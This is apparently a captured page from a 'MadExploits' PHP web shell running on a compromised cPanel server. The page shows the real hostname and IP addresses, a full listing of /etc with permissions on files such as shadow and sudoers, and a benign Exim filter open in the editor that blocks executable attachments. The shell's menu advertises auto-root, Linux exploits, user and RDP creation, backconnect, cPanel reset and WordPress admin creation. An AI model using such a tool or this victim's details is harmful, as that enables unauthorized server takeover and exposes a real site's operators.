Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.191.91.15
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
ImageMagick-6
[ DIR ]
drwxr-xr-x
NetworkManager
[ DIR ]
drwxr-xr-x
X11
[ DIR ]
drwxr-xr-x
abrt
[ DIR ]
drwxr-xr-x
alternatives
[ DIR ]
drwxr-xr-x
apache2
[ DIR ]
drwxr-xr-x
audisp
[ DIR ]
drwxr-x---
audit
[ DIR ]
drwxr-x---
bash_completion.d
[ DIR ]
drwxr-xr-x
binfmt.d
[ DIR ]
drwxr-xr-x
cagefs
[ DIR ]
drwxr-xr-x
chkconfig.d
[ DIR ]
drwxr-xr-x
chkserv.d
[ DIR ]
drwxr-xr-x
cifs-utils
[ DIR ]
drwxr-xr-x
cl.selector
[ DIR ]
drwxr-xr-x
cloud
[ DIR ]
drwxr-xr-x
collect.d
[ DIR ]
drwxr-xr-x
collectd.d
[ DIR ]
drwxr-xr-x
cpanel
[ DIR ]
drwxr-x--x
cron.d
[ DIR ]
drwxr-xr-x
cron.daily
[ DIR ]
drwxr-xr-x
cron.hourly
[ DIR ]
drwxr-xr-x
cron.monthly
[ DIR ]
drwxr-xr-x
cron.weekly
[ DIR ]
drwxr-xr-x
dbus-1
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
depmod.d
[ DIR ]
drwxr-xr-x
dhcp
[ DIR ]
drwxr-x---
dovecot
[ DIR ]
drwxr-xr-x
dpkg
[ DIR ]
drwxr-xr-x
dracut.conf.d
[ DIR ]
drwxr-xr-x
egl
[ DIR ]
drwxr-xr-x
euca2ools
[ DIR ]
drwxr-xr-x
exports.d
[ DIR ]
drwxr-xr-x
firewalld
[ DIR ]
drwxr-x---
fonts
[ DIR ]
drwxr-xr-x
gcrypt
[ DIR ]
drwxr-xr-x
gdbinit.d
[ DIR ]
drwxr-xr-x
ghostscript
[ DIR ]
drwxr-xr-x
glvnd
[ DIR ]
drwxr-xr-x
gnupg
[ DIR ]
drwxr-xr-x
groff
[ DIR ]
drwxr-xr-x
grub.d
[ DIR ]
drwx------
gss
[ DIR ]
drwxr-xr-x
gssproxy
[ DIR ]
drwxr-xr-x
imunify360
[ DIR ]
drwxr-xr-x
init.d
[ DIR ]
drwxr-xr-x
iproute2
[ DIR ]
drwxr-xr-x
kernel
[ DIR ]
drwxr-xr-x
krb5.conf.d
[ DIR ]
drwxr-xr-x
ld.so.conf.d
[ DIR ]
drwxr-xr-x
libnl
[ DIR ]
drwxr-xr-x
libpaper.d
[ DIR ]
drwxr-xr-x
libreport
[ DIR ]
drwxr-xr-x
logrotate.d
[ DIR ]
drwxr-xr-x
lsm
[ DIR ]
drwxr-xr-x
lvm
[ DIR ]
drwxr-xr-x
mail
[ DIR ]
drwxr-xr-x
modprobe.d
[ DIR ]
drwxr-xr-x
modules-load.d
[ DIR ]
drwxr-xr-x
my.cnf.d
[ DIR ]
drwxr-xr-x
named
[ DIR ]
drwxr-x---
ntp
[ DIR ]
drwxr-xr-x
openldap
[ DIR ]
drwxr-xr-x
opt
[ DIR ]
drwxr-xr-x
pam.d
[ DIR ]
drwxr-xr-x
pdns
[ DIR ]
drwxr-xr-x
pkcs11
[ DIR ]
drwxr-xr-x
pki
[ DIR ]
drwxr-xr-x
pm
[ DIR ]
drwxr-xr-x
polkit-1
[ DIR ]
drwxr-xr-x
popt.d
[ DIR ]
drwxr-xr-x
ppp
[ DIR ]
drwxr-xr-x
prelink.conf.d
[ DIR ]
drwxr-xr-x
profile.d
[ DIR ]
drwxr-xr-x
proftpd
[ DIR ]
drwxr-x--x
pure-ftpd
[ DIR ]
drwxr-xr-x
python
[ DIR ]
drwxr-xr-x
qemu-ga
[ DIR ]
drwxr-xr-x
rc.d
[ DIR ]
drwxr-xr-x
rc0.d
[ DIR ]
drwxr-xr-x
rc1.d
[ DIR ]
drwxr-xr-x
rc2.d
[ DIR ]
drwxr-xr-x
rc3.d
[ DIR ]
drwxr-xr-x
rc4.d
[ DIR ]
drwxr-xr-x
rc5.d
[ DIR ]
drwxr-xr-x
rc6.d
[ DIR ]
drwxr-xr-x
request-key.d
[ DIR ]
drwxr-xr-x
rpm
[ DIR ]
drwxr-xr-x
rsyslog.d
[ DIR ]
drwxr-xr-x
rwtab.d
[ DIR ]
drwxr-xr-x
sasl2
[ DIR ]
drwxr-xr-x
scl
[ DIR ]
drwxr-xr-x
security
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
setuptool.d
[ DIR ]
drwxr-xr-x
skel
[ DIR ]
drwxr-xr-x
smartmontools
[ DIR ]
drwxr-xr-x
snmp
[ DIR ]
drwxr-xr-x
ssh
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
statetab.d
[ DIR ]
drwxr-xr-x
stunnel
[ DIR ]
drwxr-xr-x
sudoers.d
[ DIR ]
drwxr-x---
sysconfig
[ DIR ]
drwxr-xr-x
sysctl.d
[ DIR ]
drwxr-xr-x
systemd
[ DIR ]
drwxr-xr-x
terminfo
[ DIR ]
drwxr-xr-x
tmpfiles.d
[ DIR ]
drwxr-xr-x
tuned
[ DIR ]
drwxr-xr-x
udev
[ DIR ]
drwxr-xr-x
valiases
[ DIR ]
drwxr-x--x
vdomainaliases
[ DIR ]
drwxr-x--x
vfilters
[ DIR ]
drwxr-x--x
xdg
[ DIR ]
drwxr-xr-x
xinetd.d
[ DIR ]
drwxr-xr-x
yum
[ DIR ]
drwxr-xr-x
yum.repos.d
[ DIR ]
drwxr-xr-x
zabbix
[ DIR ]
drwxr-xr-x
.brand
12
B
-rw-r--r--
.pwd.lock
0
B
-rw-------
.updated
163
B
-rw-r--r--
.whostmgrft
0
B
-rw-r--r--
DIR_COLORS
4.97
KB
-rw-r--r--
DIR_COLORS.256color
5.59
KB
-rw-r--r--
DIR_COLORS.lightbgcolor
4.56
KB
-rw-r--r--
GREP_COLORS
94
B
-rw-r--r--
GeoIP.conf
1.66
KB
-rw-r--r--
adjtime
16
B
-rw-r--r--
aliases
1.49
KB
-rw-r--r--
aliases.db
12
KB
-rw-r--r--
anacrontab
541
B
-rw-------
antivirus.exim
10.38
KB
-rw-r--r--
at.deny
1
B
-rw-r--r--
backupmxhosts
0
B
-rw-r-----
bashrc
4.31
KB
-rw-r--r--
blocked_incoming_email_countri...
0
B
-rw-r-----
blocked_incoming_email_country...
0
B
-rw-r-----
blocked_incoming_email_domains
0
B
-rw-r-----
centos-release
37
B
-rw-r--r--
centos-release-upstream
51
B
-rw-r--r--
chrony.conf
1.08
KB
-rw-r--r--
chrony.keys
481
B
-rw-r-----
collectd.conf
78
B
-rw-r--r--
cpanel_exim_system_filter
11.86
KB
-rw-r--r--
cpanel_initial_install_ea4_pro...
2.72
KB
-rw-r--r--
cpanel_mail_netblocks
15
B
-rw-r-----
cpanel_php_fpmdisable
0
B
-rw-r--r--
cpbackup-exclude.conf
138
B
-rw-r--r--
cpbackup-userskip.conf
1
B
-rw-r--r--
cpbackup.conf
502
B
-rw-r--r--
cpbackup.conf.cache
623
B
-rw-r--r--
cpbackup.public.conf
52
B
-rw-r--r--
cpsources.conf
34
B
-rw-r--r--
cpspamd.conf
0
B
-rw-r--r--
cpupdate.conf
87
B
-rw-r--r--
cpupdate.conf.backup
86
B
-rw-r--r--
cron.deny
7
B
-rw-------
crontab
451
B
-rw-r--r--
crypttab
0
B
-rw-------
csh.cshrc
1.58
KB
-rw-r--r--
csh.login
1.08
KB
-rw-r--r--
dbowners
2.3
KB
-rw-r-----
demodomains
0
B
-rw-r-----
demouids
0
B
-rw-r-----
demousers
0
B
-rw-r-----
digestshadow
0
B
-rw-r-----
domain_remote_mx_ips.cdb
2
KB
-rw-r-----
domainips
15
B
-rw-r--r--
domainusers
2.77
KB
-rw-r-----
dracut.conf
1.25
KB
-rw-r--r--
e2fsck.conf
112
B
-rw-r--r--
elinks.conf
1.07
KB
-rw-r--r--
els-release
52
B
-rw-r--r--
email_send_limits
3.87
KB
-rw-r-----
environment
0
B
-rw-r--r--
ethertypes
1.29
KB
-rw-r--r--
exim.conf
83.05
KB
-rw-r--r--
exim.conf.dist
25.79
KB
-rw-r--r--
exim.conf.local
435
B
-rw-r--r--
exim.conf.localopts
117
B
-rw-r--r--
exim.conf.mailman2.dist
29.03
KB
-rw-r--r--
exim.conf.mailman2.exiscan.dis...
29.2
KB
-rw-r--r--
exim.crt
3.98
KB
-rw-rw----
exim.key
1.64
KB
-rw-rw----
exim.pl
231
B
-rw-r--r--
exim.pl.local
164.23
KB
-rw-r--r--
exim_suspended_list
715
B
-rw-r-----
exim_trusted_configs
24
B
-rw-r--r--
eximmailtrap
0
B
-rw-r--r--
eximrejects
163
B
-rw-r--r--
eximrejects.rpmorig
367
B
-rw-r--r--
exports
0
B
-rw-r--r--
favicon.png
1.05
KB
-rw-r--r--
filesystems
70
B
-rw-r--r--
fprintd.conf
20
B
-rw-r--r--
fstab
416
B
-rw-r--r--
fstab.backup
416
B
-rw-r--r--
ftpd-ca.pem
0
B
-rw-rw----
ftpd-rsa-key.pem
1.64
KB
-rw-rw----
ftpd-rsa.pem
3.98
KB
-rw-rw----
fuse.conf
38
B
-rw-r--r--
gai.conf
296
B
-rw-r--r--
gdbinit
265
B
-rw-r--r--
greylist_common_mail_providers
0
B
-rw-r--r--
greylist_trusted_netblocks
0
B
-rw-r-----
group
3.11
KB
-rw-r--r--
group-
3.17
KB
-rw-r--r--
gshadow
2.51
KB
-rw-------
gshadow-
2.55
KB
-rw-------
host.conf
9
B
-rw-r--r--
hostname
23
B
-rw-r--r--
hosts
301
B
-rw-r--r--
hosts.allow
370
B
-rw-r--r--
hosts.deny
460
B
-rw-r--r--
idmapd.conf
4.74
KB
-rw-r--r--
inittab
511
B
-rw-r--r--
inputrc
942
B
-rw-r--r--
ipaddrpool
0
B
-rw-r--r--
ips
0
B
-rw-r--r--
ips.remotedns
29
B
-rw-r--r--
issue
23
B
-rw-r--r--
issue.net
22
B
-rw-r--r--
kdump.conf
7.1
KB
-rw-r--r--
krb5.conf
646
B
-rw-r--r--
ld.so.cache
48.65
KB
-rw-r--r--
ld.so.conf
28
B
-rw-r--r--
libaudit.conf
191
B
-rw-r-----
libuser.conf
2.33
KB
-rw-r--r--
localaliases
0
B
-rw-r--r--
localdomains
1.62
KB
-rw-r-----
localdomains.rpmnew
0
B
-rw-r--r--
locale.conf
19
B
-rw-r--r--
localtime
286
B
-rw-r--r--
login.defs
1.98
KB
-rw-r--r--
logrotate.conf
662
B
-rw-r--r--
machine-id
33
B
-r--r--r--
magic
111
B
-rw-r--r--
mail.rc
1.92
KB
-rw-r--r--
mailbox_formats
1.98
KB
-rw-r-----
mailcap
272
B
-rw-r--r--
mailhelo
25
B
-rw-r-----
mailips
0
B
-rw-r-----
makedumpfile.conf.sample
5
KB
-rw-r--r--
man_db.conf
5.05
KB
-rw-r--r--
manualmx
1
B
-rw-r-----
mime.types
50.57
KB
-rw-r--r--
mke2fs.conf
1.08
KB
-rw-r--r--
motd
466
B
-rw-r--r--
motd.backup
0
B
-rw-r--r--
mtab
0
B
-r--r--r--
my.cnf
508
B
-rw-r--r--
named.conf
20.06
KB
-rw-r--r--
named.conf.backup
20.86
KB
-rw-r--r--
named.conf.cache
2.51
KB
-rw-------
named.conf.precleandns
21.88
KB
-rw-r--r--
named.conf.precpanelinstall
1.78
KB
-rw-r-----
named.conf.prerebuilddnsconfig
3.43
KB
-rw-r--r--
named.conf.rebuilddnsconfig
3.43
KB
-rw-r--r--
named.conf.zonedir.cache
57
B
-rw-------
named.iscdlv.key
3.83
KB
-rw-r--r--
named.rfc1912.zones
931
B
-rw-r-----
named.root.key
1.84
KB
-rw-r--r--
nanorc
8.68
KB
-rw-r--r--
neighbor_netblocks
14
B
-rw-r-----
netconfig
767
B
-rw-r--r--
networks
58
B
-rw-r--r--
nfs.conf
1023
B
-rw-r--r--
nfsmount.conf
3.31
KB
-rw-r--r--
nocgiusers
0
B
-rw-r-----
nscd.conf
2.7
KB
-rw-r--r--
nsswitch.conf
1.9
KB
-rw-r--r--
nsswitch.conf.bak
1.89
KB
-rw-r--r--
odbcinst.ini
577
B
-rw-r--r--
os-release
393
B
-rw-r--r--
outgoing_mail_hold_users
0
B
-rw-r-----
outgoing_mail_suspended_users
0
B
-rw-r-----
papersize
68
B
-rw-r--r--
passwd
8.13
KB
-rw-r--r--
passwd-
8.18
KB
-rw-r--r--
passwd.cache
51.37
KB
-rw-------
passwd.nouids.cache
26.37
KB
-rw-------
pinforc
2.8
KB
-rw-r--r--
printcap
233
B
-rw-r--r--
profile
3.29
KB
-rw-r--r--
protocols
6.39
KB
-rw-r--r--
pure-ftpd.conf
10.5
KB
-rw-------
pure-ftpd.conf.rpmnew
11.33
KB
-rwxr-xr-x
pure-ftpd.pem
5.61
KB
-rw-rw----
rc.local
473
B
-rw-r--r--
recent_authed_mail_ips
0
B
-rw-r--r--
recent_authed_mail_ips_users
0
B
-rw-r--r--
recent_recipient_mail_server_i...
30
B
-rw-r-----
redhat-release
37
B
-rw-r--r--
relayhosts
0
B
-rw-r--r--
relayhostsusers
0
B
-rw-r--r--
remotedomains
0
B
-rw-r--r--
request-key.conf
1.75
KB
-rw-r--r--
resolv.conf
38
B
-rw-r--r--
resolv.conf.backup
61
B
-rw-r--r--
rndc.key
100
B
-rw-r-----
rpc
1.6
KB
-rw-r--r--
rsyncd.conf
458
B
-rw-r--r--
rsyslog.conf
3.16
KB
-rw-r--r--
rwtab
1008
B
-rw-r--r--
secondarymx
0
B
-rw-r-----
securetty
221
B
-rw-------
senderverifybypasshosts
0
B
-rw-r-----
services
654.58
KB
-rw-r--r--
sestatus.conf
216
B
-rw-r--r--
shadow
14.57
KB
-rw-------
shadow-
15.33
KB
-rw-------
shadow.nouids.cache
36.39
KB
-rw-------
shells
147
B
-rw-r--r--
skipsmtpcheckhosts
28
B
-rw-r-----
sos.conf
138
B
-rw-r--r--
spammeripblocks
0
B
-rw-r-----
spammers
0
B
-rw-r--r--
ssldomains
0
B
-rw-------
statetab
212
B
-rw-r--r--
stats.conf
37
B
-rw-r--r--
subgid
39
B
-rw-r--r--
subgid-
19
B
-rw-r--r--
subuid
39
B
-rw-r--r--
subuid-
19
B
-rw-r--r--
sudo-ldap.conf
3.11
KB
-rw-r-----
sudo.conf
1.74
KB
-rw-r-----
sudoers
4.23
KB
-r--r-----
suphp.conf
4.07
KB
-rw-r--r--
suphp.conf.rpmnew
4.42
KB
-rw-r--r--
sysctl.conf
483
B
-rw-r--r--
system-release
37
B
-rw-r--r--
system-release-cpe
23
B
-rw-r--r--
trueuserdomains
2.77
KB
-rw-r-----
trueuserowners
1.67
KB
-rw-r--r--
trusted-key.key
750
B
-rw-r--r--
trusted_mail_users
0
B
-rw-r-----
trustedmailhosts
0
B
-rw-r-----
updatedb.conf
557
B
-rw-r--r--
usb_modeswitch.conf
1.49
KB
-rw-r--r--
userbwlimits
1.41
KB
-rw-r-----
userdatadomains
13.81
KB
-rw-r-----
userdatadomains.json
15.17
KB
-rw-r-----
userdomains
2.81
KB
-rw-r-----
userips
2.64
KB
-rw-r-----
userplans
1.99
KB
-rw-r-----
vconsole.conf
37
B
-rw-r--r--
vimrc
1.94
KB
-rw-r--r--
virc
1.94
KB
-rw-r--r--
webspam
0
B
-rw-r--r--
wgetrc
4.37
KB
-rw-r--r--
wwwacct.conf
291
B
-rw-r--r--
wwwacct.conf.cache
368
B
-rw-r--r--
wwwacct.conf.shadow
79
B
-rw-------
wwwacct.conf.shadow.cache
471
B
-rw-------
yum.conf
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cpanel_exim_system_filter
# Exim filter # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # cPanel System Filter for EXIM # # VERSION = 2.0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!DO NOT MODIFY THIS FILE DIRECTLY!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Direct modifications to the /etc/cpanel_exim_system_filter file will be lost when the configuration is # # next rebuilt. To have modifications retained, please use one of the following options: # # # # 1) # # * Place each sysfilter block you wish to include in a unique file at: # # /usr/local/cpanel/etc/exim/sysfilter/options/ # # * Enable or disable the custom block in WHM using: # # Service Configuration => Exim Configuration Manager => Filters => Custom Filter: [your unique file] # # # # 2) # # * Create a custom sysfilter file in /etc/ # # * Change the location of the sysfilter file in WHM using: # # Service Configuration => Exim Configuration Manager => Filters => System Filter File # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!DO NOT MODIFY THIS FILE DIRECTLY!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Only process once # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # if not first_delivery then finish endif # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Ignore "real" errors # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # if error_message and $header_from: contains "Mailer-Daemon@" then finish endif # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # BEGIN - Included from /usr/local/cpanel/etc/exim/sysfilter/options/attachments # (Use the Basic Editor in the Exim Configuration Manager in WHM to change) # or manually edit /etc/exim.conf.localopts and run /scripts/buildeximconf ## ----------------------------------------------------------------------- # Look for single part MIME messages with suspicious name extensions # Check Content-Type header using quoted filename [content_type_quoted_fn_match] if $header_content-type: matches "(?:file)?name=(\"[^\"]+\\\\.(?:ad[ep]|ba[st]|chm|cmd|com|cpl|crt|eml|exe|hlp|hta|in[fs]|isp|jse?|lnk|md[be]|ms[cipt]|pcd|pif|reg|scr|sct|shs|url|vb[se]|ws[fhc])\")" then fail text "This message has been rejected because it has\n\ potentially executable content $1\n\ This form of attachment has been used by\n\ recent viruses or other malware.\n\ If you meant to send this file then please\n\ package it up as a zip file and resend it." seen finish endif # same again using unquoted filename [content_type_unquoted_fn_match] if $header_content-type: matches "(?:file)?name=(\\\\S+\\\\.(?:ad[ep]|ba[st]|chm|cmd|com|cpl|crt|eml|exe|hlp|hta|in[fs]|isp|jse?|lnk|md[be]|ms[cipt]|pcd|pif|reg|scr|sct|shs|url|vb[se]|ws[fhc]))([\\\\s;]|\\$)" then fail text "This message has been rejected because it has\n\ potentially executable content $1\n\ This form of attachment has been used by\n\ recent viruses or other malware.\n\ If you meant to send this file then please\n\ package it up as a zip file and resend it." seen finish endif ## ----------------------------------------------------------------------- # Attempt to catch embedded VBS attachments # in emails. These were used as the basis for # the ILOVEYOU virus and its variants - many many varients # Quoted filename - [body_quoted_fn_match] if $message_body matches "(?:Content-(?:Type:(?>\\\\s*)[\\\\w-]+/[\\\\w-]+|Disposition:(?>\\\\s*)attachment);(?>\\\\s*)(?:file)?name=|begin(?>\\\\s+)[0-7]{3,4}(?>\\\\s+))(\"[^\"]+\\\\.(?:ad[ep]|ba[st]|chm|cmd|com|cpl|crt|eml|exe|hlp|hta|in[fs]|isp|jse?|lnk|md[be]|ms[cipt]|pcd|pif|reg|scr|sct|shs|url|vb[se]|ws[fhc])\")[\\\\s;]" then fail text "This message has been rejected because it has\n\ a potentially executable attachment $1\n\ This form of attachment has been used by\n\ recent viruses or other malware.\n\ If you meant to send this file then please\n\ package it up as a zip file and resend it." seen finish endif # same again using unquoted filename [body_unquoted_fn_match] if $message_body matches "(?:Content-(?:Type:(?>\\\\s*)[\\\\w-]+/[\\\\w-]+|Disposition:(?>\\\\s*)attachment);(?>\\\\s*)(?:file)?name=|begin(?>\\\\s+)[0-7]{3,4}(?>\\\\s+))(\\\\S+\\\\.(?:ad[ep]|ba[st]|chm|cmd|com|cpl|crt|eml|exe|hlp|hta|in[fs]|isp|jse?|lnk|md[be]|ms[cipt]|pcd|pif|reg|scr|sct|shs|url|vb[se]|ws[fhc]))[\\\\s;]" then fail text "This message has been rejected because it has\n\ a potentially executable attachment $1\n\ This form of attachment has been used by\n\ recent viruses or other malware.\n\ If you meant to send this file then please\n\ package it up as a zip file and resend it." seen finish endif ## ----------------------------------------------------------------------- #### Version history # # 0.01 5 May 2000 # Initial release # 0.02 8 May 2000 # Widened list of content-types accepted, added WSF extension # 0.03 8 May 2000 # Embedded the install notes in for those that don't do manuals # 0.04 9 May 2000 # Check global content-type header. Efficiency mods to REs # 0.05 9 May 2000 # More minor efficiency mods, doc changes # 0.06 20 June 2000 # Added extension handling - thx to Douglas Gray Stephens & Jeff Carnahan # 0.07 19 July 2000 # Latest MS Outhouse bug catching # 0.08 19 July 2000 # Changed trigger length to 80 chars, fixed some spelling # 0.09 29 September 2000 # More extensions... its getting so we should just allow 2 or 3 through # 0.10 18 January 2001 # Removed exclusion for error messages - this is a little nasty # since it has other side effects, hence we do still exclude # on unix like error messages # 0.11 20 March, 2001 # Added CMD extension, tidied docs slightly, added RCS tag # ** Missed changing version number at top of file :-( # 0.12 10 May, 2001 # Added HTA extension # 0.13 22 May, 2001 # Reformatted regexps and code to build them so that they are # shorter than the limits on pre exim 3.20 filters. This will # make them significantly less efficient, but I am getting so # many queries about this that requiring 3.2x appears unsupportable. # 0.14 15 August,2001 # Added .lnk extension - most requested item :-) # Reformatted everything so its now built from a set of short # library files, cutting down on manual duplication. # Changed \w in filename detection to . - dodges locale problems # Explicit application of GPL after queries on license status # 0.15 17 August, 2001 # Changed the . in filename detect to \S (stops it going mad) # 0.16 19 September, 2001 # Pile of new extensions including the eml in current use # 0.17 19 September, 2001 # Syntax fix # #### Install Notes # # Exim filters run the exim filter language - a very primitive # scripting language - in place of a user .forward file, or on # a per system basis (on all messages passing through). # The filtering capability is documented in the main set of manuals # a copy of which can be found on the exim web site # http://www.exim.org/ # # To install, copy the filter file (with appropriate permissions) # to /etc/exim/system_filter.exim and add to your exim config file # [location is installation depedant - typicaly /etc/exim/config ] # in the first section the line:- # message_filter = /etc/exim/system_filter.exim # message_body_visible = 5000 # # You may also want to set the message_filter_user & message_filter_group # options, but they default to the standard exim user and so can # be left untouched. The other message_filter_* options are only # needed if you modify this to do other functions such as deliveries. # The main exim documentation is quite thorough and so I see no need # to expand it here... # # Any message that matches the filter will then be bounced. # If you wish you can change the error message by editing it # in the section above - however be careful you don't break it. # # After install exim should be restarted - a kill -HUP to the # daemon will do this. # #### LIMITATIONS # # This filter tries to parse MIME with a regexp... that doesn't # work too well. It will also only see the amount of the body # specified in message_body_visible # #### BASIS # # The regexp that is used to pickup MIME/uuencoded body parts with # quoted filenames is replicated below (in perl format). # You need to remember that exim converts newlines to spaces in # the message_body variable. # # (?:Content- # start of content header # (?:Type: (?>\s*) # rest of c/t header # [\w-]+/[\w-]+ # content-type (any) # |Disposition: (?>\s*) # content-disposition hdr # attachment) # content-disposition # ;(?>\s*) # ; space or newline # (?:file)?name= # filename=/name= # |begin (?>\s+) [0-7]{3,4} (?>\s+)) # begin octal-mode # (\"[^\"]+\. # quoted filename. # (?:ad[ep] # list of extns # |ba[st] # |chm # |cmd # |com # |cpl # |crt # |eml # |exe # |hlp # |hta # |in[fs] # |isp # |jse? # |lnk # |md[be] # |ms[cipt] # |pcd # |pif # |reg # |scr # |sct # |shs # |url # |vb[se] # |ws[fhc]) # \" # end quote # ) # end of filename capture # [\s;] # trailing ;/space/newline # # ### [End] # END - Included from /usr/local/cpanel/etc/exim/sysfilter/options/attachments # BEGIN - Included from /usr/local/cpanel/etc/exim/sysfilter/options/spam_rewrite # (Use the Basic Editor in the Exim Configuration Manager in WHM to change) # or manually edit /etc/exim.conf.localopts and run /scripts/buildeximconf if "${if def:header_X-Spam-Subject: {there}}" is there then headers remove Subject headers add "Subject: $rh_X-Spam-Subject:" headers remove X-Spam-Subject endif # END - Included from /usr/local/cpanel/etc/exim/sysfilter/options/spam_rewrite
Close